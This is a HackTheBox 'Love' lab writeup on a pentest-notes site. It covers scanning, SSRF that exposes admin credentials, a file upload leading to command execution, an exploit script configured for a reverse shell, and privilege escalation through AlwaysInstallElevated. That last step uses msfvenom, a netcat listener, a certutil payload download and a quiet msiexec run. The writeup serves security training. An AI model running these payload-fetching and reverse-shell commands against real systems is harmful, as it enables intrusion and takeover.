CSbyGB - Pentips
Buy me a tea
  • CS By GB - PenTips
    • Welcome to CSbyGB's Pentips
  • Networking, Protocols and Network pentest
    • Basics
    • DNS
    • FTP
    • HTTP & HTTPS
    • IMAP
    • IPMI
    • MSSQL
    • MYSQL
    • NFS
    • Oracle TNS
    • POP3
    • RDP
    • RPC
    • Rservices
    • Rsync
    • SMB
    • SMTP
    • SNMP
    • SSH
    • VOIP and related protocols
    • Winrm
    • WMI
    • Useful tips when you find unknown ports
  • Ethical Hacking - General Methodology
    • Introduction
    • Information Gathering
    • Scanning & Enumeration
    • Exploitation (basics)
    • Password Attacks
    • Post Exploitation
    • Lateral Movement
    • Proof-of-Concept
    • Post-Engagement
    • MITRE ATT&CK
  • External Pentest
    • External Pentest
  • Web Pentesting
    • Introduction to HTTP and web
    • Enumeration
    • OWASP Top 10
    • General Methodo & Misc Tips
    • Web Services and API
    • Vunerabilities and attacks
      • Clickjacking
      • CORS (Misconfigurations)
      • CSRF
      • SSRF
      • Bypass captcha
      • Template Injection (client and server side)
      • MFA bypass
      • XXE
    • Exposed git folder
    • Docker exploitation and Docker vulnerabilities
    • Websockets
  • Mobile App Pentest
    • Android
    • IOS
  • Wireless Pentest
    • Wireless pentest
  • Cloud Pentest
    • Cloud Pentest
    • Google Cloud Platform
    • AWS
  • Thick Client Pentest
    • Thick Client
  • Hardware Pentest
    • ATM
    • IoT
  • Secure Code Review
    • Secure code review
    • Java notes for Secure Code Review
  • AI & AI Pentest
    • MITRE ATLAS
    • OWASP ML and LLM
    • Hugging face
    • AI Python
    • Gemini
    • Ollama
  • Checklist
    • Web Application and API Pentest Checklist
    • Linux Privesc Checklist
    • Mobile App Pentest Checklist
  • Tools
    • Burpsuite
    • Android Studio
    • Frida
    • CrackMapExec
    • Netcat and alternatives
    • Nmap
    • Nuclei
    • Evil Winrm
    • Metasploit
    • Covenant
    • Mimikatz
    • Passwords, Hashes and wordlist tools
    • WFuzz
    • WPScan
    • Powershell Empire
    • Curl
    • Vulnerability Scanning tools
    • Payload Tools
    • Out of band Servers
    • STEWS
    • Webcrawlers
    • Websocat
  • VM and Labs
    • General tips
    • Setup your pentest lab
  • Linux
    • Initial Foothold
    • Useful commands and tools for pentest on Linux
    • Privilege Escalation
      • Kernel Exploits
      • Password and file permission
      • Sudo
      • SUID
      • Capabilities
      • Scheduled tasks
      • NFS Root Squashing
      • Services
      • PATH Abuse
      • Wildcard Abuse
      • Privileged groups
      • Exploit codes Cheat Sheet
  • Windows
    • Offensive windows
    • Enumeration and general Win tips
    • Privilege Escalation
    • Active Directory
    • Attacking Active Directory
      • LLMNR Poisoning
      • SMB Relay Attacks
      • Shell Access
      • IPv6 Attacks
      • Passback Attacks
      • Abusing ZeroLogon
    • Post-Compromise Enumeration
      • Powerview or SharpView (.NET equivalent)
      • AD Manual Enumeration
      • Bloodhound
      • Post Compromise Enumeration - Resources
    • Post Compromise Attacks
      • Pass the Password / Hash
      • Token Impersonation - Potato attacks
      • Kerberos
      • GPP/cPassword Attacks
      • URL File Attack
      • PrintNightmare
      • Printer Bug
      • AutoLogon exploitation
      • Always Installed Elevated exploitation
      • UAC Bypass
      • Abusing ACL
      • Unconstrained Delegation
    • Persistence
    • AV Evasion
    • Weaponization
    • Useful commands in Powershell, CMD and Sysinternals
    • Windows Internals
  • Programming
    • Python programming
    • My scripts
    • Kotlin
  • Binary Exploitation
    • Assembly
    • Buffer Overflow - Stack based - Winx86
    • Buffer Overflow - Stack based - Linux x86
  • OSINT
    • OSINT
    • Create an OSINT lab
    • Sock Puppets
    • Search engines
    • OSINT Images
    • OSINT Email
    • OSINT Password
    • OSINT Usernames
    • OSINT People
    • OSINT Social Media
    • OSINT Websites
    • OSINT Business
    • OSINT Wireless
    • OSINT Tools
    • Write an OSINT report
  • Pentester hardware toolbox
    • Flipper Zero
    • OMG cables
    • Rubber ducky
  • Post Exploitation
    • File transfers between target and attacking machine
    • Maintaining Access
    • Pivoting
    • Cleaning up
  • Reporting
    • How to report your findings
  • Red Team
    • Red Team
    • Defenses Enumeration
    • AV Evasion
  • Writeups
    • Hackthebox Tracks
      • Hackthebox - Introduction to Android Exploitation - Track
    • Hackthebox Writeups
      • Hackthebox - Academy
      • Hackthebox - Access
      • Hackthebox - Active
      • Hackthebox - Ambassador
      • Hackthebox - Arctic
      • Hackthebox - Awkward
      • Hackthebox - Backend
      • Hackthebox - BackendTwo
      • Hackthebox - Bastard
      • Hackthebox - Bastion
      • Hackthebox - Chatterbox
      • Hackthebox - Devel
      • Hackthebox - Driver
      • Hackthebox - Explore
      • Hackthebox - Forest
      • Hackthebox - Good games
      • Hackthebox - Grandpa
      • Hackthebox - Granny
      • Hackthebox - Inject
      • Hackthebox - Jeeves
      • Hackthebox - Jerry
      • Hackthebox - Lame
      • Hackthebox - Late
      • Hackthebox - Love
      • Hackthebox - Mentor
      • Hackthebox - MetaTwo
      • Hackthebox - Monteverde
      • Hackthebox - Nibbles
      • Hackthebox - Optimum
      • Hackthebox - Paper
      • Hackthebox - Photobomb
      • Hackthebox - Poison
      • Hackthebox - Precious
      • Hackthebox - Querier
      • Hackthebox - Resolute
      • Hackthebox - RouterSpace
      • Hackthebox - Sauna
      • Hackthebox - SecNotes
      • Hackthebox - Shoppy
      • Hackthebox - Soccer
      • Hackthebox - Steamcloud
      • Hackthebox - Toolbox
      • Hackthebox - Vault
      • Hackthebox - Updown
    • TryHackme Writeups
      • TryHackMe - Anonymous
      • TryHackMe - Blaster
      • TryHackMe - CMesS
      • TryHackMe - ConvertMyVideo
      • TryHackMe - Corridor
      • TryHackMe - LazyAdmin
      • TryHackMe - Looking Glass
      • TryHackMe - Nahamstore
      • TryHackMe - Overpass3
      • TryHackMe - OWASP Top 10 2021
      • TryHackMe - SimpleCTF
      • TryHackMe - SQL Injection Lab
      • TryHackMe - Sudo Security Bypass
      • TryHackMe - Tomghost
      • TryHackMe - Ultratech
      • TryHackMe - Vulnversity
      • TryHackMe - Wonderland
    • Vulnmachines Writeups
      • Web Labs Basic
      • Web Labs Intermediate
      • Cloud Labs
    • Mobile Hacking Lab
      • Mobile Hacking Lab - Lab - Config Editor
      • Mobile Hacking Lab - Lab - Strings
    • Portswigger Web Security Academy Writeups
      • PS - DomXSS
      • PS - Exploiting vulnerabilities in LLM APIs
    • OWASP projects and challenges writeups
      • OWASP MAS Crackmes
    • Vulnerable APIs
      • Vampi
      • Damn Vulnerable Web Service
      • Damn Vulnerable RESTaurant
    • Various Platforms
      • flAWS 1&2
  • Digital skills
    • How to make a gitbook
    • Marp
    • Linux Tips
    • Docker
    • VSCodium
    • Git Tips
    • Obsidian
  • Durable skills
    • Durable skills wheel/Roue des compétences durables
  • Projects
    • Projects
      • Technical Projects
      • General Projects
  • Talks
    • My Talks about Web Pentest
    • My talks about Android Application hacking
    • Other of my talks and Podcast
  • Resources
    • A list of random resources
Powered by GitBook
On this page
  • Nmap
  • Port 80
  • Dirb
  • Port 443
  • Port 80
  • Privesc
  1. Writeups
  2. Hackthebox Writeups

Hackthebox - Love

PreviousHackthebox - LateNextHackthebox - Mentor

Last updated 2 years ago

  • Windows

Nmap

┌──(root💀kali)-[/home/kali]
└─# nmap -T4 -sC -sV -O -Pn -p- 10.10.10.239
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-16 20:34 EDT
Nmap scan report for love.htb (10.10.10.239)
Host is up (0.024s latency).
Not shown: 65519 closed tcp ports (reset)
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: Voting System using PHP
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp   open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after:  2022-01-18T14:00:16
| tls-alpn: 
|_  http/1.1
|_http-title: 403 Forbidden
445/tcp   open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp  open  mysql?
5000/tcp  open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
5040/tcp  open  unknown
7680/tcp  open  pando-pub?
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=7/16%OT=80%CT=1%CU=32535%PV=Y%DS=2%DC=I%G=Y%TM=62D359E
OS:D%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10C%TI=I%CI=I%II=I%SS=S%TS=
OS:U)OPS(O1=M539NW8NNS%O2=M539NW8NNS%O3=M539NW8%O4=M539NW8NNS%O5=M539NW8NNS
OS:%O6=M539NNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%
OS:DF=Y%T=80%W=FFFF%O=M539NW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=
OS:0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S
OS:=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=
OS:Z)

Network Distance: 2 hops
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h41m36s, deviation: 4h02m31s, median: 21m34s
| smb2-time: 
|   date: 2022-07-17T00:59:26
|_  start_date: N/A
| smb-os-discovery: 
|   OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: Love
|   NetBIOS computer name: LOVE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-07-16T17:59:28-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 224.10 seconds

Port 80

  • We can add these 2 lines to our file /etc/hosts

10.10.10.239    love.htb
10.10.10.239    www.love.htb

Dirb

┌──(kali㉿kali)-[~]
└─$ dirb http://www.love.htb/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Jul 16 20:54:11 2022
URL_BASE: http://www.love.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://www.love.htb/ ----
==> DIRECTORY: http://www.love.htb/admin/                                                                                                                                                                                                   
==> DIRECTORY: http://www.love.htb/Admin/                                                                                                                                                                                                   
==> DIRECTORY: http://www.love.htb/ADMIN/                                                                                                                                                                                                   
+ http://www.love.htb/aux (CODE:403|SIZE:302)                                                                                                                                                                                               
+ http://www.love.htb/cgi-bin/ (CODE:403|SIZE:302)                                                                                                                                                                                          
+ http://www.love.htb/com1 (CODE:403|SIZE:302)                                                                                                                                                                                              
+ http://www.love.htb/com2 (CODE:403|SIZE:302)                                                                                                                                                                                              
+ http://www.love.htb/com3 (CODE:403|SIZE:302)                                                                                                                                                                                              
+ http://www.love.htb/con (CODE:403|SIZE:302)                                                                                                                                                                                               
==> DIRECTORY: http://www.love.htb/dist/                                                                                                                                                                                                    
+ http://www.love.htb/examples (CODE:503|SIZE:402)                                                                                                                                                                                          
==> DIRECTORY: http://www.love.htb/images/                                                                                                                                                                                                  
==> DIRECTORY: http://www.love.htb/Images/                                                                                                                                                                                                  
==> DIRECTORY: http://www.love.htb/includes/                                                                                                                                                                                                
+ http://www.love.htb/index.php (CODE:200|SIZE:4388)                                                                                                                                                                                        
+ http://www.love.htb/licenses (CODE:403|SIZE:421)                                                                                                                                                                                          
+ http://www.love.htb/lpt1 (CODE:403|SIZE:302)                                                                                                                                                                                              
+ http://www.love.htb/lpt2 (CODE:403|SIZE:302)                                                                                                                                                                                              
+ http://www.love.htb/nul (CODE:403|SIZE:302)                                                                                                                                                                                               
+ http://www.love.htb/phpmyadmin (CODE:403|SIZE:302)                                                                                                                                                                                        
==> DIRECTORY: http://www.love.htb/plugins/                                                                                                                                                                                                 
+ http://www.love.htb/prn (CODE:403|SIZE:302)                                                                                                                                                                                               
+ http://www.love.htb/server-info (CODE:403|SIZE:421)                                                                                                                                                                                       
+ http://www.love.htb/server-status (CODE:403|SIZE:421)                                                                                                                                                                                     
+ http://www.love.htb/webalizer (CODE:403|SIZE:302)                                                                                                                                                                                         
                                                                                                                                                                                                                                            
---- Entering directory: http://www.love.htb/admin/ ----
+ http://www.love.htb/admin/aux (CODE:403|SIZE:302)                                                                                                                                                                                         
+ http://www.love.htb/admin/com1 (CODE:403|SIZE:302)                                                                                                                                                                                        
+ http://www.love.htb/admin/com2 (CODE:403|SIZE:302)                                                                                                                                                                                        
+ http://www.love.htb/admin/com3 (CODE:403|SIZE:302)                                                                                                                                                                                        
+ http://www.love.htb/admin/con (CODE:403|SIZE:302)                                                                                                                                                                                         
==> DIRECTORY: http://www.love.htb/admin/includes/                                                                                                                                                                                          
+ http://www.love.htb/admin/index.php (CODE:200|SIZE:6198)                                                                                                                                                                                  
+ http://www.love.htb/admin/lpt1 (CODE:403|SIZE:302)                                                                                                                                                                                        
+ http://www.love.htb/admin/lpt2 (CODE:403|SIZE:302)                                                                                                                                                                                        
+ http://www.love.htb/admin/nul (CODE:403|SIZE:302)                                                                                                                                                                                         
+ http://www.love.htb/admin/prn (CODE:403|SIZE:302)                                                                                                                                                                                         
                                                                                                                                                                                                                                            
---- Entering directory: http://www.love.htb/Admin/ ----
+ http://www.love.htb/Admin/aux (CODE:403|SIZE:302)                                                                                                                                                                                         
+ http://www.love.htb/Admin/com1 (CODE:403|SIZE:302)                                                                                                                                                                                        
+ http://www.love.htb/Admin/com2 (CODE:403|SIZE:302)                                                                                                                                                                                        
+ http://www.love.htb/Admin/com3 (CODE:403|SIZE:302)                                                                                                                                                                                        
+ http://www.love.htb/Admin/con (CODE:403|SIZE:302)                                                                                                                                                                                         
==> DIRECTORY: http://www.love.htb/Admin/includes/                                                                                                                                                                                          
[STRIPPED]
                                                                               
-----------------
END_TIME: Sat Jul 16 21:02:26 2022
DOWNLOADED: 18448 - FOUND: 47

Port 443

  • We get some useful info to keep aside

ValentineCorp
love.htb
staging.love.htb
roy@love.htb
  • We get a new subdomain this way

Port 80

  • We can access the new subdomain through port 80

  • What if we try one of the port like 5000 (I got a forbidden when trying to access it previously)

  • In the Voters menu we can upload a file

  • If we try to execute oneliners we might need to encore our shells because it is not working as is.

  • However when reading the script you will notice that the urls are not the proper one for us. Here is how to modify the begining of the script for it to work

IP = "www.love.htb" # Website's URL
USERNAME = "admin" #Auth username
PASSWORD = "@LoveIsInTheAir!!!!" # Auth Password
REV_IP = "10.10.14.3" # Reverse shell IP
REV_PORT = "4444" # Reverse port 
# --------------------------------

INDEX_PAGE = f"http://{IP}/admin/index.php"
LOGIN_URL = f"http://{IP}/admin/login.php"
VOTE_URL = f"http://{IP}/admin/voters_add.php"
CALL_SHELL = f"http://{IP}/images/shell.php"
[STRIPPED]
  • And of course you need to put your ip the website target. Also note that the payload is indeed encoded.

Privesc

  • We can run winpeas

  • msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.2 lport=5555 -f msi > gabrielle.msi

  • We set our listener rlwrap nc -lvp 5555

  • We serve it with pythom

  • We get it on the target certutil.exe -urlcache -f http://10.10.14.2/gabrielle.msi gabrielle.msi

  • msiexec /i C:\xampp\htdocs\omrs\images\gabrielle.msi /quiet /qn /norestart

When browsing in the includes we find this page

if we lookup "voting systen sourcecodester" on google we get and

We can try to check out the certificate

We get a free file scanner with a demo option

I tried to see with http://127.0.0.1 but if we set up a python serv we could try to see if it actually fetches a file, and it does

It works! We get creds for the admin panel!!

If we connect we get an admin panel

we make a info.php file with a whoami command inside

Let's check in the images folder (we found it previously with dirb) if it gets there.

It does and if we click on it our command is executed

I decided to have a look at other exploits for the voting system now that we are authenticated. And I could find

It works and we have a reverse shell as phoebe

We can grab the user flag

Let's try this. is a way to exploit the AlwaysInstalledElevated

We are root!!

this app on codester
this exploit
this one
Here
Box on HTB
image
image
image
image
image
image
Love
always installed
root shell
image
image
image
image
image